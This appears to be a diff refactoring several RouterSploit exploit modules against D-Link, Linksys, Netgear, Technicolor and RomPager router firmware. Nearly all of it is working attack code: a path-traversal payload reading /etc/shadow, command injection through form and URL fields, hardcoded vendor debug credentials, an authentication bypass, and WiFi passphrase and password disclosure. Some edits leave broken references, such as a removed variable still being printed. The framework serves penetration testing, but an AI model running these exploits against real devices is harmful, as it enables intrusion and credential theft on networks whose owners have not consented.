        data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
        # connection
-        try:
+        response = http_request(method="POST", url=url, data=data)
-            r = requests.post(url, data=data)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None
-        if "root" in res:
+        if "root" in response.text:
            return True  # target vulnerable
        return False  # target not vulnerable

--- a/routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dwr_932_info_disclosure.py
-import requests
 import json
 from routersploit import (
    exploits,
    print_success,
    print_error,
-    sanitize_url,
    print_table,
    print_status,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -37,21 +38,15 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
        try:
-            data = json.loads(res)
+            print_status("Decoding JSON")
-            print_status("Decoding JSON value")
+            data = json.loads(response.text)
        except ValueError:
-            print_error("Response is not valid JSON")
+            print_error("Exploit failed - response is not valid JSON")
            return
        if len(data):
@@ -65,16 +60,15 @@ class Exploit(exploits.Exploit):
        headers = ("Parameter", "Value")
        print_table(headers, *rows)
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None  # could not be verified
-        if 'wifi_AP1_ssid' in res:
+        if 'wifi_AP1_ssid' in response.text:
            return True  # target is vulnerable
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/linksys/1500_2500_rce.py
+++ b/routersploit/modules/exploits/linksys/1500_2500_rce.py
-import requests
 import re
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    random_text,
+    sanitize_url,
+    http_request,
+    mute,
+)
 class Exploit(exploits.Exploit):
@@ -30,9 +38,10 @@ class Exploit(exploits.Exploit):
    password = exploits.Option('admin', 'Password to login with')
    def run(self):
-        if self.check() == True:
+        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
+            print_status("It is blind command injection - response is not available")
            self.command_loop()
        else:
            print_error("Target is not vulnerable")
@@ -44,29 +53,23 @@ class Exploit(exploits.Exploit):
    def execute(self, cmd):
        url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
-        data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
+        data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1"}
-        try:
-            r = requests.post(url, data=data, auth=(self.username, self.password))
-        except requests.exceptions.MissingSchema:
-            return "Invalid URL format: %s" % url
-        except requests.exceptions.ConnectionError:
-            return "Connection error: %s" % url
+        response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
        return ""
+    @mute
    def check(self):
-        # meaby random mark should be implemented
+        mark = random_text(32)
-        cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
+        cmd = "echo {}".format(mark)
        url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
        data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
-        try:
+        response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
-            r = requests.post(url, data=data, auth=(self.username, self.password))
+        if response is None:
-            res = r.text
+            return False  # target is not vulnerable
-        except:
-            return None # could not be verified
-        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+        if mark in response.text:
-            return True
+            return True  # target is vulnerable
-        return False
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/linksys/wap54gv3_rce.py
+++ b/routersploit/modules/exploits/linksys/wap54gv3_rce.py
-import requests
 import re
 from routersploit import (
@@ -7,6 +6,9 @@ from routersploit import (
    print_error,
    print_status,
    sanitize_url,
+    random_text,
+    http_request,
+    mute,
 )
@@ -34,7 +36,7 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target Port')
    def run(self):
-        if self.check() is True:
+        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
@@ -50,33 +52,25 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/debug.cgi".format(self.target, self.port))
        data = {"data1": cmd, "command": "ui_debug"}
-        try:
+        response = http_request(method="POST", url=url, data=data, auth=("Gemtek", "gemtekswd"))
-            r = requests.post(url, data=data, auth=("Gemtek", "gemtekswd"))
+        if response is None:
-        except requests.exceptions.MissingSchema:
+            return ""
-            return "Invalid URL format: %s" % url
-        except requests.exceptions.ConnectionError:
-            return "Connection error: %s" % url
-        res = re.findall('<textarea rows=30 cols=100>(.+?)</textarea>', r.text, re.DOTALL)
+        res = re.findall('<textarea rows=30 cols=100>(.+?)</textarea>', response.text, re.DOTALL)
        if len(res):
            return res[0]
-        else:
        return ""
+    @mute
    def check(self):
-        # meaby random mark should be implemented
+        mark = random_text(32)
-        cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
+        cmd = "echo {}".format(mark)
-        url = sanitize_url("{}:{}/debug.cgi".format(self.target, self.port))
-        data = {"data1": cmd, "command": "ui_debug"}
-        try:
+        response = self.execute(cmd)
-            r = requests.post(url, data=data, auth=("Gemtek", "gemtekswd"))
-            res = r.text
-        except:
-            return None  # could not be verified
-        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+        if mark in response:
-            return True
+            return True  # target is vulnerable
-        return False
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/multi/misfortune_cookie.py
+++ b/routersploit/modules/exploits/multi/misfortune_cookie.py
-import requests
 import re
 from routersploit import (
@@ -6,6 +5,8 @@ from routersploit import (
    print_success,
    print_error,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -38,6 +39,7 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Device seems to be not vulnerable")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/test".format(self.target, self.port))
        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
@@ -49,21 +51,20 @@ class Exploit(exploits.Exploit):
                   'Cache-Control': 'no-cache',
                   'Cookie': 'C107373883=/omg1337hax'}
-        try:
+        response = http_request(method="GET", url=url, headers=headers)
-            r = requests.get(url, headers=headers)
+        if response is None:
+            return False  # target is not vulnerable
-            if r.status_code != 404:
+        if response.status_code != 404:
            return False  # not rompage
        else:
-                if 'server' in r.headers:
+            if 'server' in response.headers:
-                    server = r.headers.get('server')
+                server = response.headers.get('server')
                if re.search('RomPager', server) is not None:
-                        if re.search('omg1337hax', r.text) is not None:
+                    if re.search('omg1337hax', response.text) is not None:
                        return True  # device is vulnerable
                    else:
-                            return None  # might be still vulnerable but could not be verified
+                        return None  # could not verify
-        except:
-            return None  # could not be verified
-        return False  # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/netgear/multi_rce.py
+++ b/routersploit/modules/exploits/netgear/multi_rce.py
-import requests
 from routersploit import (
    exploits,
    print_status,
    print_success,
    print_info,
    print_error,
+    random_text,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -68,31 +69,27 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/{}?writeData=true&reginfo=0&macAddress= "
                           "001122334455 -c 0 ;{}; echo #".format(self.target, self.port, self.valid_resource, cmd))
-        try:
+        # blind command injection
-            requests.get(url)
+        response = http_request(method="GET", url=url)
-        except requests.exceptions.MissingSchema:
-            return "Invalid URL format: %s" % url
-        except requests.exceptions.ConnectionError:
-            return "Connection error: %s" % url
        return ""
+    @mute
    def check(self):
-        # maybe random mark should be implemented
+        mark = random_text(32)
-        cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
+        cmd = "echo {}".format(mark)
        for resource in self.resources:
            url = sanitize_url("{}:{}/{}?writeData=true&reginfo=0&macAddress= "
                               "001122334455 -c 0 ;{}; echo #".format(self.target, self.port, resource, cmd))
-            try:
-                response = requests.get(url)
+            response = http_request(method="GET", url=url)
-            except:
+            if response is None:
-                return None  # could not be verified
+                return False  # target is not vulnerable
            if response.status_code == 200:
                response_body = response.text
-                if "Update Success!" in response_body and "9fdbd928b52c1ef61615a6fd2e8b49af" in response_body:
+                if "Update Success!" in response_body and mark in response_body:
                    self.valid_resource = resource
-                    return True
+                    return True  # target is vulnerable
-        return False
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/netgear/n300_auth_bypass.py
+++ b/routersploit/modules/exploits/netgear/n300_auth_bypass.py
-import requests
 from routersploit import (
    exploits,
    print_success,
    print_error,
    sanitize_url,
+    http_request,
+    mute,
 )
@@ -39,19 +39,24 @@ class Exploit(exploits.Exploit):
        else:
            print_error("Target seems to be not vulnerable")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url)
+        if response is None:
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema, requests.exceptions.ConnectionError):
+            return False  # target is not vulnerable
-            return None  # target could not be verified
-        if r.status_code == requests.codes.unauthorized:
+        # unauthorized
+        if response.status_code == 401:
            url = sanitize_url("{}:{}/BRS_netgear_success.html".format(self.target, self.port))
-            r = requests.get(url)
-            if r.status_code == requests.codes.ok:
+            response = http_request(method="GET", url=url)
-                return True
+            if response is None:
+                return False  # target is not vulnerable
+            # authorized
+            if response.status_code == 200:
+                return True  # target is vulnerable
        return False  # target not vulnerable
--- a/routersploit/modules/exploits/netgear/prosafe_rce.py
+++ b/routersploit/modules/exploits/netgear/prosafe_rce.py
-import requests
 import re
-from routersploit import *
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    random_text,
+    sanitize_url,
+    http_request,
+    mute,
+)
 class Exploit(exploits.Exploit):
@@ -31,7 +39,7 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(80, 'Target port') # default port
    def run(self):
-        if self.check() == True:
+        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
@@ -44,38 +52,32 @@ class Exploit(exploits.Exploit):
            print self.execute(cmd)
    def execute(self, cmd):
+        mark = random_text(32)
        url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo ffffffffffffffff'.format(cmd)
+        data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)
-        try:
+        response = http_request(method="POST", url=url, headers=headers, data=data)
-            r = requests.post(url, headers=headers, data=data)
+        if response is None:
-            res = r.text
+            return ""
-        except requests.exceptions.MissingSchema:
-            return "Invalid URL format: %s" % url
-        except requests.exceptions.ConnectionError:
-            return "Connection error: %s" % url
-        if 'ffffffffffffffff' in res:
+        if mark in response.text:
-            res = re.findall("(|.+?)ffffffffffffffff", res, re.DOTALL)
+            regexp = "(|.+?){}".format(mark)
+            res = re.findall(regexp, response.text, re.DOTALL)
            if len(res):
                return res[0]
-        return False
+        return ""
+    @mute
    def check(self):
-        url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
+        mark = random_text(32)
-        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
+        cmd = "echo {}".format(mark)
-        data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo 9fdbd928b52c1ef61615a6fd2e8b49af'
-        try:
+        response = self.execute(cmd)
-            r = requests.post(url, headers=headers, data=data)
-            res = r.text
-        except:
-            return None # target could not be verified
-        if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
+        if mark in response:
            return True  # target is vulnerable
-        return False # target not vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/technicolor/tc7200_password_disclosure.py
+++ b/routersploit/modules/exploits/technicolor/tc7200_password_disclosure.py
-import requests
 from routersploit import (
    exploits,
-    sanitize_url,
-    print_error,
    print_success,
+    print_error,
+    sanitize_url,
+    http_request,
+    mute,
 )
@@ -34,28 +34,25 @@ class Exploit(exploits.Exploit):
    def run(self):
        url = sanitize_url("{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
            return
+        if response.status_code == 200 and "0MLog" in response.text:
-        if r.status_code == 200 and "0MLog" in r.text:
            print_success("Exploit success")
            print r.text
        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
+    @mute
    def check(self):
        url = sanitize_url("{}:{}/goform/system/GatewaySettings.bin".format(self.target, self.port))
-        try:
+        response = http_request(method="GET", url=url)
-            r = requests.get(url, verify=False)
+        if response is None:
-        except:
+            return False  # target is not vulnerable
-            return None  # could not verify
-        if r.status_code == 200 and "0MLog" in r.text:
-            return True  # target vulnerable
+        if response.status_code == 200 and "0Mlog" in response.text:
+            return True  # target is vulnerable
+        else:
            return False  # target is not vulnerable